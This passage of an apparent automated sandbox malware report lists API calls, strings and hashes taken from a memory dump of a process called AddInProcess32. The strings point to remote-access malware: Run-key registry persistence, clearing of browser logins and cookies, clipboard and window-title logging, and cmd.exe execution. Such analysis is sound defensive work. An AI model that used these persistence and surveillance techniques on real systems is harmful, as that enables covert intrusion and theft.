                  • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                  • CloseHandle.KERNEL32(?), ref: 004051CA
                  • SetEvent.KERNEL32(?), ref: 004051D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandleObjectSingleWait
                  • String ID: Connection Timeout
                  • API String ID: 2055531096-499159329
                  • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                  • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                  • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                  • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                  Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Exception@8Throw
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 2005118841-1866435925
                  • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                  • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                  • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                  • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                  Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                  Download Yara Rule
                  APIs
                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                  • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FormatFreeLocalMessage
                  • String ID: @J@$PkGNG
                  • API String ID: 1427518018-1416487119
                  • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                  • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                  • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                  • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                  Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                  • RegSetValueExW.ADVAPI32 ref: 0041384D
                  • RegCloseKey.ADVAPI32(?), ref: 00413858
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                  • API String ID: 1818849710-1051519024
                  • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                  • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                  • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                  • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                  Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                  • String ID: bad locale name
                  • API String ID: 3628047217-1405518554
                  • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                  • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                  • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                  • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                  Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                  • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000), ref: 004137A6
                  • RegCloseKey.ADVAPI32(0046611C), ref: 004137B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: Control Panel\Desktop
                  • API String ID: 1818849710-27424756
                  • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                  • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                  • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                  • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                  Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                  • ShowWindow.USER32(00000009), ref: 00416C61
                  • SetForegroundWindow.USER32 ref: 00416C6D
                    • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                    • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                    • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                  • String ID: !D@
                  • API String ID: 3446828153-604454484
                  • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                  • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                  • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                  • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                  Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: /C $cmd.exe$open
                  • API String ID: 587946157-3896048727
                  • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                  • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                  • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                  • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: GetCursorInfo$User32.dll
                  • API String ID: 1646373207-2714051624
                  • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                  • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                  • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                  • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetLastInputInfo$User32.dll
                  • API String ID: 2574300362-1519888992
                  • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                  • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                  • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                  • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                  Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • Cleared browsers logins and cookies., xrefs: 0040C0F5
                  • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                  • API String ID: 3472027048-1236744412
                  • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                  • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                  • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                  • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                  Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                    • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                    • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                  • Sleep.KERNEL32(000001F4), ref: 0040A573
                  • Sleep.KERNEL32(00000064), ref: 0040A5FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$SleepText$ForegroundLength
                  • String ID: [ $ ]
                  • API String ID: 3309952895-93608704
                  • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                  • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                  • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                  • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                  Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                  • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                  • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                  • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                  Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                  • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                  • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                  • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                  Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041C4D7
                  • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleReadSize
                  • String ID:
                  • API String ID: 3919263394-0
                  • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                  • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                  • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                  • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                  Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                  Download Yara Rule
                  APIs
                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • CloseHandle.KERNEL32(00000000), ref: 0041C233
                  • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 39102293-0
                  • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                  • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                  • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                  • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                  Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                    • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                  • _UnwindNestedFrames.LIBCMT ref: 00439891
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                  • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                  • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                  • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                  Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsSystem
                  • String ID:
                  • API String ID: 4116985748-0
                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                  • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                  • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                  Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                    • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                  • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                  • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                  Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                  • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                  • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                  • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                  Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                  • GetLastError.KERNEL32 ref: 00449F2B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide
                  • String ID: PkGNG
                  • API String ID: 203985260-263838557
                  • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                  • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                  • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                  • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                  Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • __Init_thread_footer.LIBCMT ref: 0040B797
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Init_thread_footer__onexit
                  • String ID: [End of clipboard]$[Text copied to clipboard]
                  • API String ID: 1881088180-3686566968
                  • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                  • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                  • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                  • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                  Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ACP$OCP
                  • API String ID: 0-711371036
                  • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                  • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                  • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                  • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                  Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B7DB
                  • GetLastError.KERNEL32 ref: 0044B804
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorFileLastWrite
                  • String ID: PkGNG
                  • API String ID: 442123175-263838557
                  • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                  • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                  • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                  • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                  Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B6ED
                  • GetLastError.KERNEL32 ref: 0044B716
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorFileLastWrite
                  • String ID: PkGNG
                  • API String ID: 442123175-263838557
                  • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
